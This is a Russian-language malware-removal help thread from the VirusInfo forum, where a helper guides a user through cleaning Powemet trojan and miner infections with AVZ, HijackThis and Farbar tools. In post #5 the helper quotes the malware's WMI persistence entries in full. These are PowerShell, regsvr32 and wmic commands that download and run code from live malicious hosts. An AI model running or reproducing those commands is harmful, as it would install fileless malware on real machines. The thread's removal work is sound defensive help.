Показано с 1 по 18 из 18.

Подцепил Trojan:Win32/Powemet.A!attk и, возможно, что-то ещё (заявка № 227836)

  1. #1
    Junior Member Репутация
    Регистрация
    12.03.2008
    Сообщений
    23
    Вес репутации
    65

    Подцепил Trojan:Win32/Powemet.A!attk и, возможно, что-то ещё

    Подцепил Trojan:Win32/Powemet.A!attk
    Были ещё вредоносы, но они удалились с помощью Trojan Remover.
    А этот не хочет, что с ним делать?
    Вложения Вложения
    Позволь, я отрублю ему голову! (с) "Золотая антилопа"

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Cyber Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Info_bot
    Регистрация
    11.05.2011
    Сообщений
    2,289
    Вес репутации
    384
    Уважаемый(ая) Dzarabr, спасибо за обращение на наш форум!

    Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

    information

    Информация

    Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.





    Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста, поддержите проект.

  4. #3
    Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    11.11.2007
    Сообщений
    4,376
    Вес репутации
    164
    Здравствуйте!

    Видны следы нескольких вредоносов. Будем чистить последовательно.

    Скачайте AV block remover.
    Распакуйте, запустите и следуйте инструкциям. Если не запускается, переименуйте файл AVbr.exe в, например, AV-br.exe (или любое другое имя).

    В результате работы утилиты появится отчёт AV_block_remove_дата-время.log, прикрепите его к следующему сообщению.

    После перезагрузки системы соберите новый CollectionLog Автологером.

  5. #4
    Junior Member Репутация
    Регистрация
    12.03.2008
    Сообщений
    23
    Вес репутации
    65
    Сделал!!
    Вложения Вложения
    Позволь, я отрублю ему голову! (с) "Золотая антилопа"

  6. #5
    Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    11.11.2007
    Сообщений
    4,376
    Вес репутации
    164
    Хорошо, продолжаем.

    Временно отключите защитное ПО.
    Выполните скрипт в AVZ:

    Код:
    begin
     ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
     ClearQuarantineEx(true);
     QuarantineFile('c:\windows\Adobeupdate.exe', '');
     QuarantineFile('c:\windows\help\AdobeFlac.exe', '');
     DeleteSchedulerTask('AdobeUpdateFlac');
     DeleteSchedulerTask('AdobeUpdateFlac2');
     DeleteFile('c:\windows\Adobeupdate.exe', '64');
     DeleteFile('c:\windows\help\AdobeFlac.exe', '64');
     CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
    ExecuteSysClean;
     ExecuteWizard('SCU', 2, 3, true);
    RebootWindows(true);
    end.
    Компьютер перезагрузится.



    "Пофиксите" в HijackThis:
    Код:
    O1 - Hosts: Reset contents to default
    O22 - Tasks: Trojan Remover - C:\Program Files\Loaris Trojan Remover\ltr.exe
    O25 - WMI Event: bacru4 - bacru3 - Event="__InstanceModificationEvent WITHIN 10600 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'",  cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.oopmus.ru:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://bec.rocop.ru:8221/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://oopmus.ru:8096/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://oopmus.ru:8204/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi22.oopmus.xyz:8080/power.txt')||regsvr32 /u /s /i:http://oopmus.xyz:8080/s22.txt scrobj.dll&wmic os get /FORMAT:\"http://wmi2.oopmus.xyz:8220/s2.xsl"
    O25 - WMI Event: tosa4 - tosa3 - Event="__InstanceModificationEvent WITHIN 10500 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'",  cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.webpublicservices.org:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://185.26.113.95:8221/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://webpublicservices.org:8096/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://webpublicservices.org:8204/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi22.ha7455h6fi1.net:8080/power.txt')||regsvr32 /u /s /i:http://ha7455h6fi1.net:8080/s22.txt scrobj.dll&wmic os get /FORMAT:\"http://wmi2.ha7455h6fi1.net:8220/s2.xsl"

    Перезагрузите компьютер.

    Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

    Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе.
    Когда программа запустится, нажмите Да для соглашения с предупреждением.

    Нажмите кнопку Сканировать (Scan).
    После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.

  7. #6
    Junior Member Репутация
    Регистрация
    12.03.2008
    Сообщений
    23
    Вес репутации
    65
    Сделал!
    Да, троян-майнер был, я думал он полностью удалился...
    Кстати, ещё вопрос, у меня почему-то прекратили работать плагины VPN для браузера Google Chrome. Это может быть связано со зловредами? Или просто совпало?
    Вложения Вложения
    Последний раз редактировалось Dzarabr; 30.09.2022 в 07:57.
    Позволь, я отрублю ему голову! (с) "Золотая антилопа"

  8. #7
    Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    11.11.2007
    Сообщений
    4,376
    Вес репутации
    164
    Скачайте вложенный архив, извлеките из него reg-файл и запустите. Согласитесь с внесением изменений в реестр.
    Перезагрузите компьютер, удалите старые и соберите новые логи FRST.txt и Addition.txt
    Вложения Вложения
    • Тип файла: zip VSS.zip (1.2 Кб, 3 просмотров)

  9. #8
    Junior Member Репутация
    Регистрация
    12.03.2008
    Сообщений
    23
    Вес репутации
    65
    Готово!!
    Вложения Вложения
    Позволь, я отрублю ему голову! (с) "Золотая антилопа"

  10. #9
    Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    11.11.2007
    Сообщений
    4,376
    Вес репутации
    164
    Цитата Сообщение от Dzarabr Посмотреть сообщение
    Или просто совпало?
    Скорее всего просто совпало.

    Я пробовал поправить не запущенную службу теневого копирования и не получилось.
    Впрочем, это выходит за рамки тематики данного форума.

    Если основная проблема решена, в завершение:
    1.
    Переименуйте FRST.exe (или FRST64.exe) в uninstall.exe и запустите.
    Компьютер перезагрузится.

    Остальные утилиты лечения и папки можно просто удалить.

    2.
    • Загрузите SecurityCheck by glax24 & Severnyj, сохраните утилиту на Рабочем столе и извлеките из архива.
    • Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/8.1/10)
    • Если увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работу
    • Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt
    • Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt
    • Прикрепите этот файл к своему следующему сообщению.

  11. #10
    Junior Member Репутация
    Регистрация
    12.03.2008
    Сообщений
    23
    Вес репутации
    65
    Готово, всё сделал!
    Получается, всё, больше никаких вирусов нет?
    Вложения Вложения
    Позволь, я отрублю ему голову! (с) "Золотая антилопа"

  12. #11
    Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    11.11.2007
    Сообщений
    4,376
    Вес репутации
    164
    ------------------------------- [ Windows ] -------------------------------
    Контроль учётных записей пользователя включен
    Запрос на повышение прав для администраторов отключен
    ^Рекомендуется включить уровень по умолчанию: Win+R ввести UserAccountControlSettings и Enter^
    -------------------------- [ SecurityUtilities ] --------------------------
    KeePass Password Safe 2.51.1 v.2.51.1 Внимание! Скачать обновления
    --------------------------- [ OtherUtilities ] ----------------------------
    NVIDIA GeForce Experience 3.20.5.70 v.3.20.5.70 Внимание! Скачать обновления
    Foxit Reader v.10.1.1.37576 Внимание! Скачать обновления
    ^Локализованные версии могут обновляться позже англоязычных!^
    ------------------------------ [ ArchAndFM ] ------------------------------
    7-Zip 19.00 (x64) v.19.00 Внимание! Скачать обновления
    ^Удалите старую версию, скачайте и установите новую.^
    --------------------------------- [ P2P ] ---------------------------------
    qBittorrent 4.3.4.1 v.4.3.4.1 Внимание! Скачать обновления
    ------------------------------- [ Browser ] -------------------------------
    Google Chrome v.105.0.5195.127 Внимание! Скачать обновления
    ^Проверьте обновления через меню Справка - О браузере Google Chrome!^
    ----------------------------- [ EmailClient ] -----------------------------
    Mozilla Thunderbird (x86 ru) v.91.11.0 Внимание! Скачать обновления
    ---------------------------- [ UnwantedApps ] -----------------------------
    Loaris Trojan Remover 3.1.60 v.3.1.60 Внимание! Подозрение на демо-версию антишпионской программы, программу для обновления драйверов, программу-оптимизатор или программу очистки реестра. Рекомендуется деинсталляция и сканирование ПК с помощью Malwarebytes Anti-Malware. Возможно Вы стали жертвой обмана или социальной инженерии. Компьютерные эксперты не рекомендуют использовать такие программы.

    Будьте осторожны при установке всяких "репаков", скачанных с торрента. Лучше подобное вообще не устанавливать.

    Читайте Советы и рекомендации после лечения компьютера.

  13. #12
    Junior Member Репутация
    Регистрация
    12.03.2008
    Сообщений
    23
    Вес репутации
    65
    Да, спасибо большое!
    Буду разбираться дальше
    Позволь, я отрублю ему голову! (с) "Золотая антилопа"

  14. #13
    Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    11.11.2007
    Сообщений
    4,376
    Вес репутации
    164
    Проделайте такую же процедуру с этим вложенным файлом.
    Вложения Вложения
    • Тип файла: zip swprv.zip (939 байт, 3 просмотров)

  15. #14
    Junior Member Репутация
    Регистрация
    12.03.2008
    Сообщений
    23
    Вес репутации
    65
    Цитата Сообщение от Sandor Посмотреть сообщение
    ---------------------------- [ UnwantedApps ] -----------------------------
    Loaris Trojan Remover 3.1.60 v.3.1.60 Внимание! Подозрение на демо-версию антишпионской программы, программу для обновления драйверов, программу-оптимизатор или программу очистки реестра. Рекомендуется деинсталляция
    Loaris Trojan Remover не удаляется. Деинсталлятор не находит её. Возможно, он частично удалён и там какие-то остатки присутствуют?
    Может быть его поставить заново и потом удалить?
    Позволь, я отрублю ему голову! (с) "Золотая антилопа"

  16. #15
    Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    11.11.2007
    Сообщений
    4,376
    Вес репутации
    164
    Пробуйте удалить принудительно через Geek Uninstaller
    reg-файл получилось запустить, изменения есть?

  17. #16
    Junior Member Репутация
    Регистрация
    12.03.2008
    Сообщений
    23
    Вес репутации
    65
    Да, reg-файл запустил, отчёты прикрепил.

    Geek Uninstaller пишет вот такую штуку:
    Невозможно открыть файл С:\Program Files\Loaris Trojan Remover\uninst000.dat. Деинсталляция невозможна
    Ошибка 5: Отказано в доступе.
    Вложения Вложения
    Позволь, я отрублю ему голову! (с) "Золотая антилопа"

  18. #17
    Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    11.11.2007
    Сообщений
    4,376
    Вес репутации
    164
    Цитата Сообщение от Dzarabr Посмотреть сообщение
    пишет вот такую штуку:
    Невозможно открыть файл
    Вы пробовали правой кнопкой - Принудительное удаление?
    Изображения Изображения

  19. #18
    Junior Member Репутация
    Регистрация
    12.03.2008
    Сообщений
    23
    Вес репутации
    65
    Цитата Сообщение от Sandor Посмотреть сообщение
    Вы пробовали правой кнопкой - Принудительное удаление?
    Нет, не догадался.
    Сейчас сделал, всё получилось!
    Спасибо!
    Позволь, я отрублю ему голову! (с) "Золотая антилопа"

Похожие темы

  1. Ответов: 9
    Последнее сообщение: 05.09.2017, 20:22
  2. Возможно подцепил майнер
    От rickproza в разделе Помогите!
    Ответов: 5
    Последнее сообщение: 20.04.2015, 11:58
  3. Ответов: 23
    Последнее сообщение: 15.01.2015, 19:19
  4. возможно вируса подцепил
    От AlekseySS в разделе Помогите!
    Ответов: 9
    Последнее сообщение: 21.01.2010, 16:47
  5. Подцепил вирус, возможно с однокласников
    От Bibigon в разделе Помогите!
    Ответов: 3
    Последнее сообщение: 28.05.2008, 11:33

Свернуть/Развернуть Ваши права в разделе

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  
Page generated in 0.00004 seconds with 19 queries